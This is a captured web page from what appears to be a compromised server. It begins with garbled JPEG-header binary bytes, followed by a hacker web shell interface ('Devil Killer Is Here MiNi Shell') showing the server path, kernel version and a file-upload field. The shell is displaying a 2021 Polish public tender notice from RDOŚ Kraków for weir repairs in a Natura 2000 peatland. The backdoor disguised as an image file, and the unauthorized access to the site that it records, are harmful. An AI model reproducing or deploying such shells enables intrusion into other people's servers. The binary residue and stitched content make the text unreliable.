JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211115/0026822001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie zabiegów ochrony czynnej - remont obiektów piętrzących - zastawek na potrzeby projektu pn. „Ochrona siedlisk i gatunków terenów nieleśnych zależnych od wód” II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Regionalna Dyrekcja Ochrony Środowiska w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120803536</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mogilska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-542</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.krakow@rdos.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.krakow.rdos.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Kancelaria Adwokacka Agnieszka Gębiś</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">993-030-91-79</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">J. Bojki</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">30-611</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">sekretariat@kancelaria-gebis.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.kancelaria-gebis.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie zabiegów ochrony czynnej - remont obiektów piętrzących - zastawek na potrzeby projektu pn. „Ochrona siedlisk i gatunków terenów nieleśnych zależnych od wód” II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fe951b1d-4608-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00268220</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010232/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont obiektów hydrologicznych - zastawek na obszarze Torfowisko Wielkie Błoto, w projekcie: POIS.02.04.00-00-0108/16 </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt nr POIS.02.04.00-00-0108/16 pn. „Ochrona siedlisk i gatunków terenów nieleśnych zależnych od wód” w ramach działania 2.4 Oś priorytetowa II Programu Operacyjnego Infrastruktura i Środowisko 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://rdos-krakow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania podstawowe.1) Każdy Wykonawca może złożyć tylko jedną Ofertę. Oferta winna być<br/>sporządzona w języku polskim i złożona pod rygorem nieważności w postaci elektronicznej za<br/>pośrednictwem Platformy dostępnej pod adresem: https://rdos-krakow.ezamawiajacy.pl.2) Treść Oferty<br/>musi odpowiadać treści SIWZ.3) Zamawiający zgodnie z § 4 Rozporządzenia Prezesa Rady Ministrów<br/>w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz.<br/>1320) - zwane dalej „Rozporządzeniem&#34; określa dopuszczalny format kwalifikowanego podpisu<br/>elektronicznego, jako:a) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,b)<br/>dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny<br/>plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć oddzielny plik z<br/>podpisem.4) Zamawiający, zgodnie z § 3 ust. 3 ww. Rozporządzenia określa niezbędne wymagania<br/>sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:a) stały dostęp do sieci<br/>Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC, o<br/>następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna<br/>przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0.,d) włączona obsługa JavaScript,e) zainstalowany program Acrobat<br/>Reader lub inny obsługujący pliki w formacie .pdf.5) Zamawiający zgodnie z § 3 ust. 3 ww.<br/>Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB<br/>w formatach: pdf., excel., doc., zip.6) Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia określa<br/>informacje na temat kodowania i czasu odbioru danych, tj. plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po<br/>upływie terminu składania ofert.7) Oznaczenie czasu odbioru danych przez Platformę stanowi datę<br/>oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego<br/>odpowiednim źródłem czasu - zegarem Głównego Instytutu Miar.2. Ogólne zasady korzystania z<br/>Platformy.1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na<br/>subdomenie Regionalnej Dyrekcji Ochrony Środowiska w Krakowie: https://rdoskrakow.<br/>ezamawiajacy.pl lub https://oneplace.marketplanet.pl.2) Wykonawca po wybraniu opcji<br/>„przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca<br/>zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło,<br/>następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj<br/>się”.3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający<br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w<br/>postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się<br/>pod numerem telefonu podanym w ww. potwierdzeniu.4) Po założeniu konta Wykonawca ma<br/>możliwość złożenia Oferty w postępowaniu. 5) Korzystanie z Platformy jest bezpłatne.6) Zamawiający<br/>informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy,<br/>Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma<br/>zakupowa Regionalnej Dyrekcji Ochrony Środowiska w Krakowi, tel. +48 22 576 87 90, email:<br/>oneplace.admin@marketplanet.pl.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://rdos-krakow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1) – zwanego dalej „RODO”, Zamawiający informuje, że:1) administratorem danych<br/>osobowych osób fizycznych, w tym wykonawcy będącego osobą fizyczną, wykonawcy będącego<br/>osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą, pełnomocnika wykonawcy<br/>będącego osobą fizyczną, członka organu zarządzającego wykonawcy, będącego osobą fizyczną,<br/>osobą fizyczną skierowana do przygotowania i przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego – zwanych dalej „osobami fizycznymi”, jest Regionalny Dyrektor Ochrony<br/>Środowiska z siedzibą w Krakowie, ul. Mogilska 25, 31-542 Kraków, tel. +48 12 61-98-120 oraz spółka<br/>Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną<br/>do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla<br/>m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem<br/>KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na<br/>której Regionalna Dyrekcja Ochrony Środowiska w Krakowie prowadzi postępowania o udzielenie<br/>zamówienia publicznego, działającą pod adresem: https://rdos-krakow.ezamawiajacy.pl.2) kontakt z<br/>inspektorem ochrony danych Zamawiającego następuje za pomocą adresu e-mail:<br/>sekretriat.krakow@rdos.gov.pl; 3) dane osobowe osób fizycznych przetwarzane będą na podstawie art.<br/>6 ust. 1 lit c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.:<br/>Wykonanie zabiegów ochrony czynnej na obszarze Natura 2000 Torfowisko Wielkie Błoto PLH120080<br/>(remont obiektów piętrzących - zastawek) na potrzeby projektu nr POIS.02.04.00-00-0108/16 pn.<br/>„Ochrona siedlisk i gatunków terenów nieleśnych zależnych od wód” w ramach działania 2.4 Oś<br/>priorytetowa II Programu Operacyjnego Infrastruktura i Środowisko 2014-2020, II postępowanie nr ref.: STI.<br/>082.1.18.2021 prowadzonym w trybie podstawowym bez negocjacji;4) odbiorcami danych<br/>osobowych osób fizycznych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (t.j. Dz. U. 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”;5) dane osobowe osób fizycznych<br/>będą przechowywane, zgodnie z art. 78 ust. 1 ustawyPzp, przez okres 4 lat od dnia zakończenia<br/>postępowania, okres przechowywania obejmuje cały czas trwania umowy;6) obowiązek podania przez<br/>osoby fizyczne danych osobowych dotyczących bezpośrednio tych osób jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanych z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy;7) w odniesieniu do<br/>danych osobowych osób fizyc</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8) osoby fizyczne posiadają:a) prawo dostępu do danych<br/>osobowych Pani/Pana dotyczących (na podstawie art. 15 RODO). W przypadku gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego lub konkursu.b) prawo do sprostowania<br/>Pani/Pana danych osobowych (na podstawie art. 16 RODO)*;c) prawo żądania (na podstawie art. 18<br/>RODO) od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO**Wystąpienie z żądaniem, o którym mowa w art.<br/>18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu; d) prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2 00-193 Warszawa w przypadku<br/>uznania, że przetwarzanie przez Muzeum Pani/Pana danych osobowych narusza przepisy RODO9)<br/>osobą fizycznym nie przysługuje:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia<br/>danych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;c)<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1 lit. c RODO.*<br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. ** Wyjaśnienie:<br/>prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ST-I.082.1.18.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Wykonanie zabiegów ochrony czynnej na obszarze Natura 2000<br/>Torfowisko Wielkie Błoto PLH120080 (remont obiektów piętrzących - zastawek) na potrzeby<br/>projektu nr POIS.02.04.00-00-0108/16 pn. „Ochrona siedlisk i gatunków terenów nieleśnych<br/>zależnych od wód” w ramach działania 2.4 Oś priorytetowa II Programu Operacyjnego<br/>Infrastruktura i Środowisko 2014-2020 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45247200-2 - Roboty w zakresie budowy tam i innych konstrukcji stałych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie koordynatora</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3. O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>4) zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony jeżeli<br/>Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej jedno zamówienie<br/>polegające na wykonaniu zabiegów ochronny czynnej na obiekcie ( lub urządzeniu)<br/>hydrotechnicznym lub melioracyjnym, rzece lub potoku, rowie, o wartości tej zamówienia albo<br/>łącznej wartości tych zamówień minimum 100.000,00 zł brutto.<br/>5) Warunek dotyczący zdolności zawodowej zostanie spełniony jeżeli wykonawca wykaże, iż<br/>dysponuje osobą zdolną do wykonania zamówienia, tj.:<br/>Koordynatorem prac:<br/>a. kwalifikacje i umiejętności: uprawnienia do kierowania robotami budowlanymi w specjalności<br/>inżynieryjnej hydrotechnicznej bez ograniczeń, lub uprawnienia równoważne do powyższych, a<br/>wydane na podstawie wcześniej obowiązujących przepisów prawa oraz przynależność do<br/>Okręgowej Izby Inżynierów Budownictwa,<br/>b. posiada doświadczenie w wykonaniu co najmniej jednego zamówienia polegającego na<br/>wykonaniu zabiegów ochronny czynnej na obiekcie ( lub urządzeniu) hydrotechnicznym lub<br/>melioracyjnym, rzece lub potoku, rowie. Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994r. Prawo<br/>budowlane (t.j. Dz. U. z 2019 r. poz. 1186 z późn. zm.) oraz rozporządzeniem Ministra Inwestycji<br/>i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. poz. 831).<br/>Dopuszcza się uprawnienia równoważne – dla osoby, która posiada uzyskane przed dniem<br/>wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia lub stwierdzenie<br/>posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji w budownictwie i<br/>zachowała uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/>W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w<br/>innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane, lub którzy<br/>nabyli prawa do wykonywania określonych zawodów regulowanych lub określonych działalności<br/>w oparciu o przepisy prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej<br/>lub państw członkowskich 